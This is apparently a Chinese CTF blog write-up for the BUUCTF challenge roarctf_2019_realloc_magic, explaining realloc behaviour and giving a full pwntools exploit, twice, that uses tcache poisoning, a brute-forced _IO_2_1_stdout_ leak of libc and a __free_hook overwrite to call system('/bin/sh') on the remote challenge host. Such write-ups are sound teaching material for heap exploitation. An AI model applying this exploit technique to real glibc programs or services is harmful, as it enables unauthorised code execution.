这道题目帮助我学习了realloc这个函数,是一道十分经典的题目,我会尽量的把exp的每一步都说清楚

例行检查我就不放了

讲程序放入ida中

比较简单的流程,没有show功能,所有我们需要通过爆破stdout这个函数来获得libc

我先放上我学习的俩位师傅的博客

(16条消息) BUUCTF-PWN roarctf_2019_realloc_magic(tcache attack,块重叠,劫持_IO_2_1_stdout_泄露libc)_L.o.W的博客-CSDN博客

好好说话之Tcache Attack(1):tcache基础与tcache poisoning_hollk’s blog-CSDN博客 这个博客重点看tcache poisoning部分

然后我先放上realloc的四种不同的用法

realloc的几个特殊用法(摘自官方WP)

size == 0 ,这个时候等同于free
realloc_ptr == 0 && size > 0 , 这个时候等同于malloc
malloc_usable_size(realloc_ptr) >= size, 这个时候等同于edit
malloc_usable_size(realloc_ptr) < szie, 这个时候才是malloc一块更大的内存,将原来的内容复制过去,再将原来的chunk给free掉
然后我将完整的exp放在下面进行一步步的分析

------------------------------------------------------------------------------------------------------------------EXP-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

from pwn import *
#p = process('./pwn1')

elf = ELF('./pwn1')
libc = ELF('./libc-2.27.so')

def launch_gdb():
  context.terminal = ['xfce4-terminal','-x','sh','-c']
  gdb.attach(proc.pidof(p)[0])

def add(size,content):
  p.sendlineafter('>> ','1')
  p.sendlineafter('Size?\n',str(size))
  p.sendafter('Content?\n',content)

def free():
  p.sendlineafter('>>','2')

def ba():
  p.sendlineafter('>>','66i6')

def pwn():

  add(0x70,'a')
  add(0,'')
  add(0x100,'a')
  add(0,'')
  add(0xa0,'a')
  add(0,'')    #这里我们申请了四个不同大小的chunk 然后将它们释放掉

  add(0x100,'b')      #然后将chunk2申请回来

  [free() for i in range(7)]   #通过for循环填满tcache的7个chunk块
  add(0,'')         #将申请回来的chunk2释放掉,注意释放掉的chunk将放入unsortedbin里面 (这里会出现mare的地址)

  add(0x70,'a')       #我们将chunk1申请回来
  add(0x180,b'c'*0x78+p64(0x41)+b'\x60\x87')  #我们申请了一个0x180大小的chunk,刚好是chunk1和chunk2加起来的大小,相当于edit将泄露出的地址后面覆盖为了6087去爆破_IO_2_1_stdout的位置

  add(0,'')                  #我们将chunk释放掉(会进入unsortedbin的链表里面)

  add(0x100,'a')                #我们将chunk2申请回来,注意这个chunk是从tcache里面申请的,fd已经是stdout的位置了
  add(0,'')                  #我们将chunk2释放掉,但是因为这个chunk的大小我们已经改成了0x41大小了,所以这个chunk会放在新的tcache的队列里面,所以0x110的队列就留下了fd的指针,又因为fd指向的是stdout的地址所以我们在申请一个chunk就能申请到相应的地址上面了

  add(0x100,p64(0xfbad1887)+p64(0)*3+p8(0x58))  #在这里我们申请到了stdout的位置 下面获得libc

  libc_base = u64(p.recvuntil('\x7f',timeout=0.1)[-6:].ljust(8,b'\x00')) - 0x3e82a0 #0x3e82a0这个值是减去vmmap的里面相应的值

  if libc_base == -0x3e82a0: if判断形成自动化
    exit(-1)
  print('libc_base:'+hex(libc_base))

  free_hook = libc_base + libc.sym['__free_hook']
  onegadget = libc_base + 0xf4322
  system = libc_base + libc.sym['system']
  p.sendline('666')
  add(0x120,'a')
  add(0,'')
  add(0x130,'a')
  add(0,'')
  add(0x170,'a')
  add(0,'')

  add(0x130,'a')     和上面泄露libc的同理由
  [free() for i in range(7)]
  add(0,'')
  add(0x120,'a')
  add(0x260,b'a'*0x128+p64(0x41)+p64(free_hook-8))
  add(0,'')
  add(0x130,'a')
  add(0,'')
  add(0x130,b'/bin/sh\x00'+p64(system))
  free()

  p.interactive()
if __name__ == "__main__":
  while True:
#p = process('./pwn1')
    p = remote('node4.buuoj.cn',28076)
    try:
      pwn()
    except:
      p.close()

------------------------------------------------------------------------------------------------------------------------------------------------------------结束-------------------------------------------------------------------------------------------------------------------------------------------------------

这道题是一个非常好的题目,希望可以多多复习一下,能认真的去理解和调试一下

完整exp

from pwn import *

#p = process('./pwn1')

elf  = ELF('./pwn1')

libc = ELF('./libc-2.27.so')

def launch_gdb():

    context.terminal = ['xfce4-terminal','-x','sh','-c']

    gdb.attach(proc.pidof(p)[0])

def add(size,content):

    p.sendlineafter('>> ','1')

    p.sendlineafter('Size?\n',str(size))

    p.sendafter('Content?\n',content)

def free():

    p.sendlineafter('>>','2')

def ba():

    p.sendlineafter('>>','66i6')

def pwn():

    add(0x70,'a')

    add(0,'')

    add(0x100,'a')

    add(0,'')

    add(0xa0,'a')

    add(0,'')

    add(0x100,'b')

    [free() for i in range(7)]

    add(0,'')

    add(0x70,'a')

    add(0x180,b'c'*0x78+p64(0x41)+p8(0x60)+p8(0x87))

    add(0,'')

    add(0x100,'a')

    add(0,'')

    add(0x100,p64(0xfbad1887)+p64(0)*3+p8(0x58))

    libc_base = u64(p.recvuntil('\x7f',timeout=0.1)[-6:].ljust(8,b'\x00')) - 0x3e82a0

    if libc_base == -0x3e82a0:

        exit(-1)

    print('libc_base:'+hex(libc_base))

    free_hook = libc_base + libc.sym['__free_hook']

    onegadget = libc_base + 0xf4322

    system = libc_base + libc.sym['system']

    p.sendline('666')

    add(0x120,'a')

    add(0,'')

    add(0x130,'a')

    add(0,'')

    add(0x170,'a')

    add(0,'')

    add(0x130,'a')

    [free() for i in range(7)]

    add(0,'')

    add(0x120,'a')

    add(0x260,b'a'*0x128+p64(0x41)+p64(free_hook-8))

    add(0,'')

    add(0x130,'a')

    add(0,'')

    add(0x130,b'/bin/sh\x00'+p64(system))

    free()

    p.interactive()

if __name__ == "__main__":

    while True:

        #p = process('./pwn1')

        p = remote('node4.buuoj.cn',28076)

        try:

            pwn()

        except:

            p.close()

结束

tcache poisoning(爆破stout获得libc并且熟练使用了realloc)的更多相关文章

  1. 由一道CTF pwn题深入理解libc2.26中的tcache机制

    本文首发安全客:https://www.anquanke.com/post/id/104760 在刚结束的HITB-XCTF有一道pwn题gundam使用了2.26版本的libc.因为2.26版本中加 ...

  2. SWPUCTF 2019 pwn writeup

    来做一下以前比赛的题目,下面两个题目都可以在buu复现(感谢赵总). SWPUCTF_2019_login 32位程序,考点是bss段上的格式化字符串.用惯onegadgets了,而对于32位程序来说 ...

  3. BIT 常态化在线CTF系统 pwn题目

    偶然得到这个平台,发现是BIT的CTF平台,应该是平时的阶段性的训练题目.看了看题,其他方向的题目感觉都是入门题,但是pwn题目,发现还是比入门题难一点点的,来记录一下. pwn1 栈上任意位置的读写 ...

  4. Pwn Heap With Tcache

    Pwn Heap With Tcache 前言 glibc 2.26 开始引入了 tcache , 相关的 commit 可以看 这里 .加入 tcache 对性能有比较大的提升,不过由于 tcach ...

  5. Oracle TNS Listener Remote Poisoning

    Oracle TNS Listener Remote Poisoning 远程数据投毒漏洞(CVE-2012-1675) 1.漏洞简介: 允许攻击者在不提供用户名/密码的情况下,向远程“TNS Lis ...

  6. 常见寄存器以及常见汇编指令,常见爆破指令 good

    CPU的任务就是执行存放在存储器里的指令序列.为此,除要完成算术逻辑操作外,还需要担负CPU和存储器以及I/O之间的数据传送任务.早期的CPU芯片只包括运算器和控制器两大部分.到了近几年,为了使存储器 ...

  7. de1ctf_2019_weapon(爆破_IO_2_1_stdout)

    (这是我真正意义上的完完全全自己做的第一道堆题目,虽然花了快三个小时,谨以此篇纪念一下) 题目的例行检查我就不放了,将程序放入ida中 程序的逻辑十分简单,漏洞也非常明显 重点是这个程序没有给我们sh ...

  8. ubuntu进行子域名爆破

    好记性不如烂笔头,此处记录一下,ubuntu进行子域名的爆破. 先记录一个在线的子域名爆破网址,无意中发现,很不错的网址,界面很干净,作者也很用心,很感谢. https://phpinfo.me/do ...

  9. 快来熟练使用 Mac 编程

    熟练使用工具,可以提高一个人的做事效率- 1. iTerm2快捷键使用 ⌘ + d: 垂直分屏,⌘ + shift + d: 水平分屏. ⌘ + ]和⌘ + [在最近使用的分屏直接切换.而⌘ + op ...

随机推荐

  1. [atARC076E]Connected

    首先,如果没有这个平面的限制,考虑不断插入一对点,将与这两点连线有交的线从左到右,依次"移动"到左端点边上,因此一定是可行的 但当存在界限后,对于两个端点都在边界上的点对(一个端点 ...

  2. SpringMVC注解搭配环境

    1.准备文件 2.工程中的pom <?xml version="1.0" encoding="UTF-8"?> <project xmlns= ...

  3. AI剪辑和自定义UI,打造更智能的剪辑体验

    为满足开发者构建高效的应用内视频编辑能力,7月的HMS Core 6.0 推出了视频编辑服务(Video Editor Kit),一站式的视频处理能力获得了积极反响.同时,我们也关注到开发者需要集成丰 ...

  4. 2017Java前景怎么样?

    当今社会互联网软件行业属于高薪技术行业,伴随着互联网的发展Java在Web领域的优势也日渐凸显,并且java语言本身就应用最广泛,最高效.据说,全球有25亿Java器件运行着Java,450多万Jav ...

  5. [Noip 2018][标题统计 龙湖斗 摆渡车 对称二叉树]普及组题解

    啊喂,都已经9102年了,你还在想去年? 这里是一个Noip2018年PJ第二题打爆的OIer,错失省一 但经过了一年,我学到了很多,也有了很多朋友,水平也提高了很多,现在回看当时: 今年的Noip ...

  6. [POI2002][HAOI2007]反素数

    题意 反素数 想法 证明这样一个结论 对于一个可行的反素数\(p\) \(p = \sum_{i}^{k} p_{k} ^ {c_k}\) 当 \(p_i > p_j 有 c_i < c_ ...

  7. Codeforces 1290D - Coffee Varieties(分块暴力+完全图的链覆盖)

    Easy version:Codeforces 题面传送门 & 洛谷题面传送门 Hard version:Codeforces 题面传送门 & 洛谷题面传送门 发现自己交互题烂得跟 s ...

  8. AT695 マス目

    AT695 マス目 本题选自 DP 优化方法大杂烩 状压部分. 这个题很 nb.下文记 \(n=H\),\(m=W\). 对于每一列,如果只记录一个格子是否为黑色,那么发现它无法处理从右边绕到左边再绕 ...

  9. 问题记录:SNP 标记 phasing

    GATK4 检测的SNP标记,有些位点会在检测过程中完成 phasing,在后续做基因型填充的时候有坑. GATK4 phasing 结果的缺失位点不是 ./. 也不是 .|.  而是直接变成一个单独 ...

  10. mysql-彻底删除方法

    一.如果是使用yum安装的mysql,使用如下命令进行卸载(不能确定使用何种方式安装的mysql情况下,按后续步骤一一进行处理即可): yum remove mysql mysql-server my ...